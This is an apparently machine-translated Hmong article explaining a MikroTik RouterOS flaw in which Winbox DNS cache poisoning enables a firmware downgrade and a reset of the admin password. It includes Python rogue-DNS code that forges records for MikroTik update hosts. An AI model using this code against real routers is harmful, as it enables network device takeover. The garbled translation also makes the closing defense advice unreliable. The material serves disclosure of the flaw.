Lub peev xwm los txo qis cov khoom siv nyob deb raws li RouterOS (Mikrotik) ua rau ntau pua txhiab tus khoom siv hauv network muaj kev pheej hmoo. Qhov tsis zoo yog cuam tshuam nrog kev lom ntawm DNS cache ntawm Winbox raws tu qauv thiab tso cai rau koj kom thauj khoom tsis tu ncua (nrog rau tus password rov pib dua) lossis hloov kho firmware rau hauv lub cuab yeej.
Cov ntsiab lus tsis zoo
Lub RouterOS davhlau ya nyob twg txhawb kev daws teeb meem rau DNS nrhiav.
Qhov kev thov no yog ua los ntawm binary hu ua tus daws teeb meem. Resolver yog ib qho ntawm ntau binaries uas txuas rau RouterOS's Winbox raws tu qauv. Nyob rau theem siab, "cov lus" xa mus rau Winbox chaw nres nkoj tuaj yeem xa mus rau ntau yam binaries hauv RouterOS raws li cov txheej txheem array-based.
Los ntawm lub neej ntawd, RouterOS muaj DNS server feature raug kaw.
Txawm li cas los xij, txawm tias thaum lub server ua haujlwm tsis ua haujlwm, router tswj nws tus kheej DNS cache.
Thaum peb thov siv winbox_dns_request piv txwv example.com, router yuav cache qhov tshwm sim.
Txij li thaum peb tuaj yeem hais qhia tus DNS server los ntawm qhov kev thov yuav tsum mus, nkag mus rau qhov chaw tsis raug yog qhov tsis tseem ceeb. Piv txwv li, koj tuaj yeem teeb tsa DNS server siv los ntawm kom ib txwm teb nrog A cov ntaub ntawv uas muaj tus IP chaw nyob 192.168.88.250.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()Tam sim no yog tias koj tshawb nrhiav example.com siv Winbox, koj tuaj yeem pom tias lub router DNS cache raug tshuaj lom.
Tau kawg, lom example.com tsis muaj txiaj ntsig zoo vim tias router yuav tsis siv nws. Txawm li cas los xij, lub router xav tau nkag mus rau upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com thiab download.mikrotik.com. Thiab ua tsaug rau lwm qhov yuam kev, nws muaj peev xwm ua rau lom lawv txhua lub sijhawm.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("download.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()Lub router thov ib qho kev tso cai, thiab peb muab tsib rov qab. Lub router tsis cache tag nrho cov lus teb kom raug.
Pom tseeb, qhov kev tawm tsam no kuj tseem muaj txiaj ntsig yog tias lub router ua raws li DNS server, vim nws tso cai rau cov neeg siv ntawm router raug tawm tsam.
Qhov kev tawm tsam no tseem tso cai rau koj los siv qhov kev pheej hmoo loj dua: downgrade lossis backport lub version ntawm RouterOS. Tus neeg tawm tsam rov tsim dua lub logic ntawm cov neeg rau zaub mov hloov tshiab, suav nrog kev hloov pauv, thiab yuam RouterOS kom pom tau tias cov khoom siv tsis tu ncua (qhov tsis zoo) raws li tam sim no. Qhov txaus ntshai ntawm no yog nyob rau hauv qhov tseeb tias thaum lub version yog "hloov tshiab", tus thawj coj lo lus zais rov qab mus rau lub neej ntawd tus nqi - tus neeg tawm tsam tuaj yeem nkag mus rau hauv lub kaw lus nrog tus password khoob!
Kev tawm tsam yog ua haujlwm heev, txawm tias qhov tseeb siv ntau ntau vectors, nrog rau cov uas muaj feem rau , tab sis qhov no twb yog cov txheej txheem rov ua dua thiab nws siv rau lub hom phiaj tsis raug cai yog txhaum cai.
kev tiv thaiv
Tsuas yog kev siv Winbox tso cai rau koj los tiv thaiv koj tus kheej los ntawm cov kev tawm tsam no. Txawm hais tias yooj yim ntawm kev tswj hwm ntawm Winbox, nws yog qhov zoo dua los siv SSH raws tu qauv.
Tau qhov twg los: www.hab.com